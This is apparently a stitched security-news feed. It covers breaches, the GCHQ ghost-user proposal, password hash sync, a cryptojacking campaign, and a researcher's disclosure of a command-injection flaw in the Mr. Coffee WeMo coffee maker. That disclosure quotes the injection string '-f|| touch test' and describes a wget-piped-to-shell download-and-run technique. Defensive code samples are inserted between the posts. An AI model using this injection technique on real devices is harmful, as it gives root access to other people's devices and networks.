When the Gmail confidential mode was launched in beta in August 2018, experts pointed out that though recipients cannot save or print the mail as such, it’s not possible to stop the recipient from taking a screenshot. Similarly, experts also pointed out that this feature could be used in future for launching phishing attacks, especially since there is a link that necessitates login from the part of the recipient.

How to use Gmail confidential mode

Users can at present go to Apps > G Suite > Settings for Gmail > User settings and choose either the “Disable” or the “Enable now (beta)” option. Once the feature is launched for general use, users can choose the “Enable when the feature is in general availability” option. Google provides users with detailed instructions about protecting emails using the confidential mode, how to send and read confidential messages, how to work with Gmail confidential mode messages in Vault, etc.

So now, it’s going to be a wait till June 25, when the Gmail confidential mode will be made available on all G Suite editions, with one to three days for feature visibility on both the rapid and scheduled release domains.


The post Gmail’s Confidential Mode for All G Suite Users from June 25 appeared first on .

What’s Your Defense Strategy? Best Practices for Red Teams, Blue Teams, Purple Teams

Want to determine the safety of a car? Perform a crash test. One of the most common ways to test the strength of something, particularly when it comes to technology, is by putting it through a stress test. Naturally, this same principle is a critical component of cybersecurity. One of the most effective ways to find your security infrastructure’s weaknesses, and to test your security team’s ability to detect and respond to attacks, is through red team/blue team tests. Read on to find out the differences between these teams, the emergence of purple teams, and the most effective ways to utilize them.

Red team and blue team tests are named and modeled after military exercises. In order to ensure soldiers are battle ready, simulations are run to test out the effectiveness of their defense strategies. In these simulations, red teams take on the offensive role of the enemy, while the blue team is on the defensive, shielding their position. In the cybersecurity realm, the roles are the same, but the battlefield is in the digital sphere.


What is a Red Team?

Red teams are designed to think like attackers, and are brought on specifically to put the organization’s cybersecurity posture to the test, utilizing multiple strategies in order to breach defenses. Some of these approaches include vulnerability assessments, penetration tests, or even social engineering attacks like phishing. Red teams use a variety of tools, such as pen testing solutions like Core Impact, to create the most effective simulation they can.

Though key parties may be informed that a red team campaign is taking place, most employees, including the organization’s IT team, won’t be notified until after the fact, making it as authentic as possible.

Red teams can be internal, which helps set up long term goals and ensures frequent testing. Oftentimes, however, they are hired from an external firm. Having an outside team, like Security Consulting Services, come in can also be ideal since they provide a fresh pair of expert eyes, often seeing vulnerabilities that internal security personnel may miss, simply because internal teams have such frequent exposure to the environment they’re testing.

What is a Blue Team?

Blue teams are in charge of building up an organization’s protective measures, and taking action when needed. This is done in a variety of ways. Regular system hardening procedures include updates, patching, eliminating unused software or features, or changing passwords. Additionally, new security tools can be deployed, like SIEM solutions that help blue teams monitor data logs from different assets for security alerts.

What is a Purple Team?

More recently, the idea of a purple team has become the latest buzzword in the cybersecurity world. While there is some confusion surrounding the usage and definition of the term, it’s best to focus on the ideal it is promoting. Ultimately, the concept of a purple team is the mindset of seeing and treating red and blue teams as symbiotic. It’s not red teams vs. blue teams, but rather one large team focusing on the one overarching goal: improving security. The key to becoming a purple team comes down to communication.

One of the purposes of a red team is to act as a training function for the blue team. Infiltrating and testing the environment is only part of the job. Measuring and improving the ability to detect and respond to attacks is a key part of living up to the ideal of being a purple team. Red teams must prioritize documentation and education efforts so that blue teams can take appropriate action towards remediation and build up resiliency.

Blue teams, in turn, should view the findings of a red team as a guide for where to focus their efforts, and as a roadmap to find vulnerabilities before the next exercise. In a perfect scenario, red teams wouldn’t find the same vulnerability twice.

Best Practices, No Matter the Color

Operating like a purple team is simply adhering to best practices in order to create an environment that is a stronghold against cyber-attacks. As mentioned above, communication between teams is the most critical element in this, but here are a few other ways to get the most out of your red team and blue team exercises:

Have a plan of action.

The planning stages of simulation exercises are just as important as the exercises themselves. There are endless scenarios and methodologies to use when attempting to exploit a system, so it’s vital to limit your scope. Red teams should have set objectives and measurable goals that will provide helpful data for blue teams to analyze. Blue teams should use this data to create their own objectives and goals for remediation.

Always follow up.

While it’s tempting to simply move on to the next task, it’s critical to follow up after every exercise. Retrospectives are a great way for teams to learn from one another and can shed further light on patching and preventing weaknesses. Additionally, fixes themselves must also be verified, so following up with retesting efforts is crucial.

Think outside the box.

Threat actors aren’t following a set of rules when they break into a system. Red teamers can stay within the scope of the exercise while still having the freedom to be equally creative. However, remember to show your work – blue teams can only prevent an attack if they can understand how it was done.

Never stop learning.

Promote a culture of learning and encourage both red and blue teams to stay up to date on the latest tools and tricks to prevent being caught off guard. Hackers are always evolving, and true purple teams evolve right along with them.


Get the Most Out of Your Red Team

Equip your red team with a comprehensive pen testing solution that can safely exploit vulnerabilities. Get a live demo of Core Impact today.

Insight Venture Partners to Acquire Recorded Future


Insight Venture Partners has agreed to acquire a controlling interest in Recorded Future, a threat intelligence company, in addition to the minority stake it already owns. The all-cash transaction puts the value of Recorded Future at more than $780 million. 

According to its press release, Recorded Future is the largest privately held threat intelligence software company in the world, with more than 400 clients. Its solution is powered by its patented machine learning, alerting companies to unknown threats before they affect the business, helping teams respond to alerts 10 times faster. The solution pulls information from technical, open web and dark web sources and aggregates it with customer data. 

Insight Venture Partners is a leading global capital and private equity firm investing in high-growth technology and software companies. Founded in 1995, it has over $20 billion of assets under management and has cumulatively invested in over 300 companies worldwide.

According to Recorded Future's co-founder and CEO, Christopher Ahlberg, the investment will help the company "tap into the full potential of its technical roadmap" and solve some of "the most difficult and unique intelligence challenges" today.  

“My leadership team and I have had the privilege to work with Mike Triplett and the Insight team for a number of years, benefiting from their sage advice, industry knowledge and relationships," he commented. "This transaction is the logical next step for Recorded Future given the opportunities in front of us, as we fully realize the potential and vision of our strategy.”

Triplett, managing director at Insight, said: “Insight’s renewed investment is a testament to the vision and direction laid out by Recorded Future’s leadership team. They envision a world where everyone applies intelligence at speed and scale to reduce risk, remaining hyper-focused on providing clients with the threat intelligence necessary to understand their environments, manage risk, and combat malicious actors through contemporary awareness gained from the implementation of a threat intelligence-led security strategy." 

Pursuant to the terms of this investment, Triplett and Thomas Krane, VP at Insight, will join Recorded Future’s board of directors.

Recorded Future customers have included Bank of America, Nasdaq, Abbott and T-Mobile. 

Checkers double drive-thru restaurants chain discloses card breach

Checkers and Rally’s, one of the largest chains of double drive-thru restaurants in the United States, disclosed a credit card breach.

“We recently became aware of a data security issue involving malware at certain Checkers and Rally’s locations.” reads a breach notice published by the company. “After discovering the issue, we quickly engaged leading data security experts to conduct an extensive investigation and coordinated with affected restaurants and federal law enforcement authorities to address the matter.”

According to the security notice, crooks breached the company’s systems and planted PoS malware in its payment processing system, allowing an unauthorized party to siphon off the payment card data of some guests. The malware only infected the point-of-sale systems at some Checkers and Rally’s locations.

“The malware was designed to collect information stored on the magnetic stripe of payment cards, including cardholder name, payment card number, card verification code and expiration date.” continues the notice. “Based on the investigation, we have no evidence that other cardholder personal information was affected by this issue.”
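The notice describes exactly the data a memory-scraping PoS malware harvests: the Track 1 and Track 2 contents of the magnetic stripe. One thing a response team can do with that description is scan memory dumps, network captures or suspicious files for track-formatted data, which is how such implants are commonly hunted. The scanner below is an added example, not code from Checkers or the Security Affairs post; the track layouts are the public ISO/IEC 7813 formats, the Luhn check filters out random digit runs, and the sample buffer is constructed using the well-known test PAN 4111 1111 1111 1111 rather than any real card.

```python
import re
from typing import Dict, List

# Track 2: start sentinel ';', PAN (13-19 digits), '=', expiry YYMM, 3-digit service
# code, discretionary data, end sentinel '?'.
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d*)\?")
# Track 1 format B: '%B', PAN, '^', cardholder name, '^', expiry YYMM, service code,
# discretionary data, '?'.
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([^^]{2,26})\^(\d{2})(\d{2})(\d{3})([^?]*)\?")


def luhn_ok(pan: str) -> bool:
    """Mod-10 check-digit test; most random digit runs that fit the regex fail it."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep only BIN and last four so the finding itself is not a card-data leak."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track_data(buf: bytes) -> List[Dict[str, str]]:
    """Return masked findings for every Luhn-valid track record in `buf`."""
    hits = []
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            hits.append({"track": "2", "pan": mask_pan(pan),
                         "expiry": f"20{m.group(2).decode()}-{m.group(3).decode()}",
                         "offset": str(m.start())})
    for m in TRACK1_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            # The cardholder name (group 2) is deliberately not copied into the finding.
            hits.append({"track": "1", "pan": mask_pan(pan),
                         "expiry": f"20{m.group(3).decode()}-{m.group(4).decode()}",
                         "offset": str(m.start())})
    return hits


# Constructed sample buffer: one valid Track 2 record, one decoy that fails Luhn,
# and one valid Track 1 record, separated by NUL bytes as in a process memory dump.
SAMPLE_BUFFER = (
    b"\x00\x00;4111111111111111=25121011234567890?\x00"
    b";1234567890123=2512101?\x00"
    b"%B4111111111111111^DOE/JANE^25121011234?\x00"
)


if __name__ == "__main__":
    for hit in find_track_data(SAMPLE_BUFFER):
        print(hit)
```

Run against a real dump, the offsets tell the analyst which process region held the data; the masked PAN and expiry are enough to correlate with the card brands without retaining full card numbers in the case file.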

The company provided a list of the affected locations and the estimated windows of exposure during which the PoS malware was used to steal the guests’ card data.

102 restaurants have been impacted, roughly 15% of all locations.

Most of the impacted locations were infected with the PoS malware between early 2018 and 2019; the list also includes some locations compromised back in 2017, and one infection dates back to September 2016.

Checkers declared that the malicious code was completely removed from the payment systems in April 2019.

The company reported the card breach to the authorities and hired third-party security experts to contain and remove the malware.

“After identifying the incident, we promptly launched an extensive investigation and took steps to contain the issue. We also are working with federal law enforcement authorities and coordinating with the payment card companies in their efforts to protect cardholders,” reads the Checkers notice. “We encourage you to review your account statements and contact your financial institution or card issuer immediately if you identify an unauthorized charge on your card. The payment card brands’ policies provide that cardholders have zero liability for unauthorized charges that are reported in a timely manner.”

The company encourages potentially affected guests to review their account statements and contact their financial institution or card issuer immediately if they identify an unauthorized charge on their card.

Clients are entitled under U.S. law to one free credit report annually from each of the three nationwide consumer reporting agencies. 

Pierluigi Paganini

(SecurityAffairs – Checkers, card breach)

The post Checkers double drive-thru restaurants chain discloses card breach appeared first on Security Affairs.

Companies and Experts Call on GCHQ to Abandon “Ghost User” Proposal


Technology companies, trade associations, civil society organizations and 17 individual experts in digital security and policy have signed an open letter to the UK's Government Communications Headquarters (GCHQ), outlining concerns regarding a proposal by the intelligence center on allowing access to encrypted devices. The letter was shared with GCHQ on May 22, 2019, and made public on May 29, 2019.

GCHQ set forth its proposal for “silently adding a law enforcement participant to a group chat or call” in a Lawfare article in November 2018. This would "add a ghost user into encrypted chats" that would "require providers to suppress normal notifications to users." According to the letter, this would make users "unaware that a law enforcement participant had been added and could see the plain text of the encrypted conversation."

Written by Sharon Bradford Franklin and Andi Wilson Thompson, the letter to GCHQ explains how the ghost proposal would work, the ways in which technology companies would need to change their systems and the dangers that it would present. Specifically, the consortium outlined that if implemented, such access would “undermine the authentication process that enables users to verify that they are communicating with the right people, introduce potential unintentional vulnerabilities, and increase risks that communications systems could be abused or misused.” 

Jake Moore, security specialist at ESET, told Infosecurity that the proposal by GCHQ "makes a mockery of the fundamental basics of encryption."

"Not only is it going against what privacy is all about, but if you create a back door for the good guys, the bad guys won’t be far behind. Encryption is there for multiple reasons and shouldn’t be messed with. GCHQ has always had an issue with breaking serious encryption but to now demand access to private chats has far-reaching implications. 

"Cyber-criminals are not just using WhatsApp and, if a law one day passes to read this application, it will just push them to use another app – if they aren’t already. There are many apps which already promise ultimate privacy and are heavily used and relied upon.”

The open letter from the group asks GCHQ "to abandon the ghost proposal and any other approach that would pose similar risks to digital security and human rights." They also request an open dialogue with the intelligence organizations to address law enforcement access to encrypted chats and messages. 

This news comes after Germany proposed giving access to security authorities to apps such as WhatsApp and Telegram. 

93% of Companies Are Overconfident of Their Ability to Stop Data Breaches


Organizations are not equipping themselves against privileged access management (PAM) abuse, according to a report by Centrify and Techvangelism. Nearly 80% of organizations were found not to have a mature approach to combating PAM cyber-attacks, yet 93% of the organizations surveyed believe they were somewhat prepared for threats that involve privileged credentials. 

“This survey indicates that there is still a long way to go for most organizations to protect their critical infrastructure and data with mature privileged access management approaches based on zero trust,” says Tim Steinkopf, CEO of Centrify. “We know that 74% of data breaches involve privileged access abuse, so the overconfidence these organizations exhibit in their ability to stop them from happening is concerning."

The report found that companies do not take "the simplest" of measures, with 52% stating they do not use a password vault. In fact, out of the 1,300 organizations across 11 industry verticals in the U.S. and Canada, 43% were identified as having a "nonexistent" PAM approach. 

The survey also revealed that over half of companies surveyed have some questionable privileged access control; for example, 52% use shared accounts for controlling privileged access; 58% of organizations do not use multifactor authentication (MFA) for privileged administrative access to servers, and 51% of organizations do not control access to transformational technologies with privileged access, including modern attack surfaces, such as cloud workloads, big data projects and containers.

Looking at industry-specific trends, 39% of technology organizations have a nonexistent approach to PAM, as do healthcare (45%) and government (42%), which are both highly regulated and handle sensitive data. The financial sector scored highest in the "mature" category, followed by energy and utilities (26%). 

Cathy Hall, PAM practice lead at Sila Solutions Group, wrote about the best practice for PAM for Infosecurity Magazine in April 2019: "The best way to handle ... PAM ... isn’t to simply check a box to satisfy a mandate, it’s to view it as a mission. A mission-based approach ensures that you improve security across your whole enterprise over time, rather than only satisfying a limited, one-time mandate." 

Android Q: Cheat sheet

Android Q's features will transform some phones into more user-friendly, customizable, and secure environments. Here's what developers, businesses, and users need to know about Google's Android 10.0.

Mr. Coffee with WeMo: Double Roast

McAfee Advanced Threat Research recently released a blog detailing a vulnerability in the Mr. Coffee Coffee Maker with WeMo. Please refer to the earlier blog to catch up with the processes and techniques I used to investigate and ultimately compromise this smart coffee maker. While researching the device, there was always one attack vector that I had wanted to revisit. It was during the writing of that blog that I was finally able to circle back to it. As it turns out, my intuition was accurate; the second vulnerability I found was much simpler and still allowed me to gain root access to the target.

Recapping the original vulnerability

The first vulnerability modified the “template” section of the brew schedule rule file, which is a unique file that is sent when the user schedules a brew in advance. I also needed to modify the template itself, sent from the WeMo App directly to the coffee maker. During that research I noticed that many of the other fields could be impactful but did not investigate them as thoroughly as the template field.

Figure 1: Brew schedule rule

When the user schedules a brew, an individual rule is added to the Mr. Coffee root crontab. The crontab entry uses the rule’s “id” field to make sure the correct rule is executed at the desired time.

Figure 2: Root crontab entry

Crontab allows for basic scheduling features from the OS level. The user provides both the command to execute as well as timing details down to the minute, as shown in Figure 3.

Figure 3: Crontab syntax

During the initial research, I started to fuzz the rule id field; however, because every rule name that I placed in the malicious schedule was always prepended by the “/sbin/rtng_run_rule”, I could not get anything abnormal to happen. I also noticed that a lot of characters that could be useful for command injection were being filtered.

The following is a list of characters sanitized or filtered on input.

At this point I moved on and ended up finding the template vulnerability as laid out in the previous blog.

Finding an even more simple vulnerability

A few months after disclosing to Belkin, I revisited the steps to achieve this template abuse feature, in preparation for a public disclosure blog. Having the ability to write arbitrary code directly into the root’s crontab is enticing, so I began looking into it again. I needed to find a way to terminate the “rtng_run_rule” and add my own commands to the crontab file by modifying the “id” field. The “rtng_run_rule” file is a shell script that directly calls a Lua script named “rtng_run_rule.lua”. I noticed that I could send the double pipe “||” character but the “rtng_run_rule” wrapper script would never return a failing return code. Next, I looked at how the wrapper script handles command line arguments, as shown below.

Figure 4: rtng_run_rule wrapper script

At this point I created a new rule: “-f|| touch test”. The “-f” is not a parsed argument, meaning it will take the “Bad option” case, causing the “rtng_run_rule” wrapper script to return “-1”. With the wrapper script returning a failing return code, the “||” (or) statement is initiated, which executes “touch test” and creates an empty file named “test”. Since I still had serial access (I explain in detail in my previous blog how I achieved this) I was able to log in to the coffee maker and find where the “test” file was located. I found it in root’s home directory.

Being able to write arbitrary files and execute commands without the “/” character is still somewhat limiting, as most file paths and web URLs will need forward slashes. I needed to find a way to execute commands that had “/” characters in them. I decided to do this by downloading a file from a webserver I control and executing it in Ash, which bypasses the filtering of file-path characters.

Figure 5: Commands allowing for execution of filtered characters.

Let me break this down. The “-f”, as indicated before, will cause the wrapper script to fail, so the command after “||” is executed. Then the “wget” command will initiate a download from my web server, located at IP address “”. The “-q” will force wget to only print what it receives, and the “-O -” tells wget to print to STDOUT instead of a file. Finally, the “| ash” command grabs all the output from STDOUT and executes it as Linux shell commands.

This way I can set up a server that simply returns a file containing necessary Linux commands and host it on my local machine. When I send the rule with the above command injection it will reach out to my local server and execute everything as root. The technique of piping wget into Ash also bypasses all the character filtering so I can now execute any command I want.
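The write-up shows why a character blocklist on the rule “id” is not a fix. As an added example (not Belkin’s code or McAfee’s), here is the handling a defender would want on the scheduler side: an allowlist for the id, a crontab entry built only from the validated value, and a check over an existing root crontab for entries that do not have the scheduler’s shape. The blocklist, the crontab line format and the sample crontab are constructed approximations, not taken from the device.

```python
"""Allowlist validation and crontab-shape checking for a scheduler rule id.

Models the pattern in the write-up: a user-supplied rule "id" is interpolated
into a root crontab line that runs /sbin/rtng_run_rule <id>. Everything here
is an illustrative approximation, not the device's firmware.
"""
import re
import shlex

# Rule ids the scheduler generates itself are short opaque tokens, so a strict
# allowlist of word characters is enough (assumption for this example). A
# leading "-" is excluded so an id can never be parsed as a wrapper option.
RULE_ID_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")

# A blocklist in the spirit of the one the write-up describes as ineffective:
# it strips "/" and some shell metacharacters but lets "|" and "-" through.
# (Constructed; the real filtered set is not reproduced on the page.)
BLOCKLIST = set("/;&`$<>\n")


def blocklist_sanitize(rule_id: str) -> str:
    """The weak approach: drop 'bad' characters and keep the rest."""
    return "".join(ch for ch in rule_id if ch not in BLOCKLIST)


def validate_rule_id(rule_id: str) -> str:
    """The strong approach: reject anything that is not a plain token."""
    if not RULE_ID_RE.fullmatch(rule_id):
        raise ValueError(f"rejected rule id: {rule_id!r}")
    return rule_id


def crontab_line(minute: int, hour: int, rule_id: str) -> str:
    """Build the crontab entry from a validated, shell-quoted id only."""
    rid = validate_rule_id(rule_id)
    return f"{minute} {hour} * * * /sbin/rtng_run_rule {shlex.quote(rid)}"


# Shape of an entry the scheduler itself would write (constructed).
EXPECTED_ENTRY = re.compile(
    r"^\S+ \S+ \S+ \S+ \S+ /sbin/rtng_run_rule [A-Za-z0-9_]{1,64}$")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def suspicious_cron_entries(crontab_text: str) -> list:
    """Return crontab lines that are neither comments, variable assignments
    nor well-formed scheduler entries; anything else is worth an alert."""
    flagged = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or ENV_LINE.match(stripped):
            continue
        if not EXPECTED_ENTRY.match(stripped):
            flagged.append(stripped)
    return flagged


# Constructed sample root crontab: one legitimate entry and one carrying the
# injection string quoted in the write-up.
SAMPLE_CRONTAB = """\
# constructed sample, not captured from a device
PATH=/sbin:/bin
30 6 * * * /sbin/rtng_run_rule rule_0001
30 6 * * * /sbin/rtng_run_rule -f|| touch test
"""

if __name__ == "__main__":
    print(crontab_line(30, 6, "rule_0001"))
    print(suspicious_cron_entries(SAMPLE_CRONTAB))
```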

Status with Vendor

Belkin did patch the original template vulnerability and released new firmware. The vulnerability explained in this blog was found on the new firmware and, as of today, we have not heard of any plans for a patch. This vulnerability was disclosed to Belkin on February 25th, 2019. In accordance with our vulnerability disclosure policy, we are releasing details of this flaw today in hopes of alerting consumers of the device of the ongoing security findings. While this bug is also within the Mr. Coffee with WeMo’s scheduling function, it is much easier for an attacker to leverage since it does not require any modifications to templates or rehashing of code changes. The following demo video shows how this vulnerability can be used to compromise other devices on the network, including a fully patched Windows 10 PC.

Key takeaways for enterprises, consumers and vendors

Devices such as the Mr. Coffee Coffee Maker with WeMo serve as a good reminder of the pros and cons to “smart” IoT. While advances in automation and technology offer exciting new capabilities, they should be weighed against the potential security concerns. In a home setting, consumers should set up these types of devices on a segmented network, isolated from sensitive network traffic and more critical devices. They should implement a strong password policy to make network access more challenging and apply patches or updates for all networked devices whenever available. Enterprises should restrict access to devices such as these in corporate environments or, at a minimum, provide a policy for oversight and management. They should be treated just the same as any other asset on the network, as IoT devices are often unmonitored pivot points into more critical network infrastructure. Network scanning and vulnerability assessments should be performed, in conjunction with a rigorous patching cycle for known issues. While the vendor has not provided a CVE for this vulnerability, we calculated a CVSS score of 9.1 out of 10. This score would categorize this as a critical vulnerability. Finally, as consumers of these products, we need to ask more of the vendors and manufacturers. A better understanding of secure coding and vulnerability assessment is critical, before products go to market. Vendors who implement a vulnerability reporting program and respond quickly can gain consumers’ trust and ensure product reputation is undamaged. One goal of the McAfee Advanced Threat Research team is to identify and illuminate a broad spectrum of threats in today’s complex and constantly evolving landscape. Through analysis and responsible disclosure, we aim to guide product manufacturers toward a more comprehensive security posture.

The post Mr. Coffee with WeMo: Double Roast appeared first on McAfee Blogs.

AI, the Mandatory Element of 5G Mobile Security

The complexity and scale of the 5G ecosystem, combined with a lack of skills and training in software-centric security, will be important drivers for AI deployment in the carrier space.

Demystifying Password Hash Sync

This blog is part of a series of posts providing a behind-the-scenes look of Microsoft’s Detection and Response Team (DART). While responding to cybersecurity incidents around the world, DART engages with customers who are wary about using Password Hash Sync (PHS) or are not utilizing this service’s full capabilities. As customers can gain tremendous security benefits using the full capabilities of this service, we want to demystify PHS.

What PHS is and is not

What is PHS? First, let’s start with what it is not. PHS doesn’t sync actual passwords. Rather, it syncs the hashes of passwords, which have all undergone a per-user salt and 1,000 iterations of the HMAC-SHA256 key hashing algorithm, before being sent to Azure Active Directory (Azure AD). Through our hands-on experiences, we’ve learned that many companies believe that Microsoft may have access to users’ passwords. Microsoft is committed to protecting your privacy, and it’s important to note that the SHA256 hash is one-way and cannot be reversed, so the plain-text version of the password is never and can never be exposed to Microsoft.

The second important consideration is that, with PHS, your identity management provider moves from your current provider to Azure AD. This allows the organization to move from an identity management provider that is typically an on-premises server, requiring maintenance and potentially server downtime, to a platform-as-a-service (PaaS) provider.

From a security perspective, organizations gain significant reliability advantages and improved capabilities by moving to PHS, including Smart Lockout, IP Lockout, and the ability to discover leaked credentials, as well as the benefits of utilizing Microsoft’s billions of worldwide data points as additional layers of security to your organization’s environment.

More about these key features:

  • Smart Lockout assists in blocking bad actors who are attempting to brute force passwords. By default, Smart Lockout locks the account from sign-in attempts for one minute after ten failed attempts. Smart Lockout tracks the last three bad password hashes to avoid re-incrementing the lockout counter. For more information Smart Lockout, see Azure AD Smart Lockout.
  • IP Lockout works by analyzing those billions of sign-ins to assess the quality of traffic from each IP address hitting Microsoft’s systems. With that analysis, IP Lockout finds IP addresses acting maliciously, such as an IP that is password spraying the tenant, and blocks those sign-ins in real-time, while allowing the real user to continue to successfully sign in.
  • Microsoft Leaked Credentials Service acquires username/password pairs by monitoring public web sites and the Dark Web and by working with:
    • Researchers
    • Law enforcement
    • Microsoft Security teams
    • Other trusted sources

When the service acquires username/password pairs, the passwords are sent through the same hashing algorithm and are checked against Azure AD users’ password hashes. When a match is found (indicating a compromised credential), a “Leaked Credentials Risk Event” is created. Please see Azure AD Risk Events for additional information regarding Leaked Credentials.
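The hashing scheme, the Leaked Credentials check and the Smart Lockout counter described above can be modelled together. This is an added illustration, not Microsoft’s code: it applies a per-user salt and 1,000 iterations of HMAC-SHA256 (PBKDF2) to the password, checks a leaked password by running it through the same scheme with the user’s salt, and implements a lockout counter with the stated defaults (ten failures, one minute, last three bad hashes remembered). Salt length, function names and the sample data are assumptions.

```python
"""Illustrative model of Password Hash Sync protections as described in the post.

Not Microsoft's implementation; parameters that the text states are named as
such, everything else is an assumption made for the example.
"""
import hashlib
import hmac
import os
import time

ITERATIONS = 1000            # stated in the text
LOCKOUT_THRESHOLD = 10       # failed attempts before lockout (stated default)
LOCKOUT_SECONDS = 60         # lockout duration (stated default)
REMEMBERED_BAD_HASHES = 3    # last N bad password hashes tracked (stated)


def phs_hash(password: str, salt: bytes) -> bytes:
    """Per-user salt + 1,000 iterations of HMAC-SHA256 (PBKDF2). This value,
    not the password, is what would be synchronized."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def new_user(password: str) -> dict:
    """Create a user record holding only the salt and the derived hash."""
    salt = os.urandom(16)    # salt length is an assumption
    return {"salt": salt, "hash": phs_hash(password, salt)}


def leaked_credential_match(user: dict, leaked_password: str) -> bool:
    """Leaked Credentials check: a username/password pair found in a dump is
    hashed with that user's salt and compared with the stored hash."""
    candidate = phs_hash(leaked_password, user["salt"])
    return hmac.compare_digest(candidate, user["hash"])


class SmartLockout:
    """Per-user failure counter that does not re-increment when the same wrong
    password (one of the last three bad hashes) is retried."""

    def __init__(self, user: dict, clock=time.monotonic):
        self.user = user
        self.clock = clock
        self.failures = 0
        self.recent_bad = []        # last REMEMBERED_BAD_HASHES bad hashes
        self.locked_until = 0.0

    def attempt(self, password: str) -> str:
        """Return 'ok', 'bad' or 'locked' for one sign-in attempt."""
        now = self.clock()
        if now < self.locked_until:
            return "locked"
        candidate = phs_hash(password, self.user["salt"])
        if hmac.compare_digest(candidate, self.user["hash"]):
            self.failures = 0
            self.recent_bad.clear()
            return "ok"
        if candidate not in self.recent_bad:
            self.failures += 1
            self.recent_bad.append(candidate)
            del self.recent_bad[:-REMEMBERED_BAD_HASHES]
        if self.failures >= LOCKOUT_THRESHOLD:
            self.failures = 0
            self.locked_until = now + LOCKOUT_SECONDS
            return "locked"
        return "bad"


if __name__ == "__main__":
    # Constructed sample data for a stand-alone run.
    alice = new_user("CorrectHorse!")
    print("leaked password matches:", leaked_credential_match(alice, "CorrectHorse!"))
    lock = SmartLockout(alice)
    print([lock.attempt(f"Wrong{i}") for i in range(1, 11)])
```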

Another important benefit of PHS is that, should your tenant experience a Denial of Service (DoS) and/or password spray attack, Microsoft will take the brunt of that traffic. That traffic is directed at Microsoft, not your on-premises Active Directory Federation Services (AD FS). When authentication happens via on-premises AD FS, your server is responsible for absorbing that load, potentially causing downtime.

Moving an organization’s identity management provider to Azure AD and utilizing Password Hash Sync allows for both an increase in overall security posture and reduced management overhead. The security benefits, including leaked credentials, IP lockout, and Smart Lockout, all utilize Microsoft’s telemetry that gives organizations the power of Microsoft’s intelligence.

NOTE: If PHS is the secondary authentication method and you want to take advantage of Smart Lockout and IP Lockout, the primary authentication method must support these capabilities. In a hybrid environment where Federated or Pass-through Authentication is primary, PHS is recommended as the secondary method, both as a redundancy mechanism and to enable the collection of Leaked Credentials information.

Learn more

To learn more about DART, our engagements, and how they are delivered by experienced cybersecurity professionals who devote 100 percent of their time to providing cybersecurity solutions to customers worldwide, please contact your account executive. Also, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Read DART: the Microsoft cybersecurity team we hope you never meet for more about the DART team.

The post Demystifying Password Hash Sync appeared first on Microsoft Security.

Nansh0u Miner Attack 50000 MS-SQL, PHPMyAdmin Servers

Chinese hackers have secretly compromised more than 50,000 MS-SQL and PHPMyAdmin servers to mine TurtleCoin as part of a large-scale cryptojacking campaign called Nansh0u.

The campaign was discovered in early April and began on 26 February. It focused on servers around the world, including companies from different sectors, with more than 700 victims a day.

According to the Guardicore Labs team which discovered the attacks, “During our investigation, we found 20 versions of malicious payloads, with new payloads created at least once a week and used immediately after their creation time,” and the hackers used “five attack servers and six connect-back servers”.

The Guardicore Labs team attributed this campaign to Chinese operators using multiple indices:

To compromise the Windows MS-SQL and PHPMyAdmin servers, the hackers used a variety of tools, including a port scanner, an MS-SQL brute-force tool and a remote execution engine.

With the help of the port scanner, they found MS-SQL servers by checking whether the default MS-SQL port was open. These servers were automatically fed into the brute-force tool, which attempted to log in with thousands of commonly used credentials.

Once they breached a server, the Nansh0u operators infected it with one of 20 versions of the malicious payload, using an MS-SQL script that downloads the payload and runs it on the compromised machine. The elevation-of-privilege vulnerability CVE-2014-4113 was exploited to execute the payloads with SYSTEM privileges on infected servers; each dropped and executed payload is designed as a wrapper that carries out multiple actions.

As Guardicore researchers noted after analyzing the samples collected from the attack servers through the Guardicore Global Sensors Network (GGSN), the wrappers perform the following:

• Execute the crypto-currency miner;
• Create persistency by writing registry run-keys;
• Protect the miner process from termination using a kernel-mode rootkit;
• Ensure the miner’s continuous execution using a watchdog mechanism.

The XMRig and JCE cryptocurrency miners connect to four mining pools to mine TurtleCoin, a privacy-oriented cryptocurrency with fast transactions in which all transactions are private by default.

Many of the payloads also drop a kernel-mode driver with a random file name, its code obfuscated with VMProtect, that is not detected by most AV engines.

The driver is signed with a certificate, since revoked by Verisign, issued to a Chinese company called Hangzhou Hootian Network Technology. Its stated purpose is to “protect processes and prevent the user from closing” them.

Kernel-mode driver digital signature
It also “contains additional rootkit functionality such as communicating with physical hardware devices and modifying internal Windows process objects that are unused by this particular malware.”

In addition, the kernel-mode driver, which ensures that the miner is not terminated, supports virtually all Windows versions from Windows 7 to Windows 10, including beta versions.

The Guardicore Labs team has made a full list of IOCs for this cryptojacking campaign available, including payload hashes, IP addresses used in the attacks and mining pool domains.

In addition, a PowerShell script is provided that can be run on a potentially compromised server to check whether it has been infected by the Nansh0u campaign.

The post Nansh0u Miner Attack 50000 MS-SQL, PHPMyAdmin Servers appeared first on .

TrustArc at European Data Protection Summit

Data Protection World Forum will launch a new event for 2019, The European Data Protection Summit & Dinner which takes place next week on 3rd June, 2019 at a newly launched state-of-the-art event suite at 133 Houndsditch, London. This one-day event is designed to tackle the latest issues, challenges and developments that data protection, privacy and security professionals are facing in 2019. In the evening the summit will transform into an evening-dinner where attendees will be able to enjoy a drinks reception, three-course meal, networking and entertainment. The European Data Protection Summit & Dinner will bring together an international line-up … Continue reading TrustArc at European Data Protection Summit

The post TrustArc at European Data Protection Summit appeared first on TrustArc Blog.

Fraudulent Academic Papers

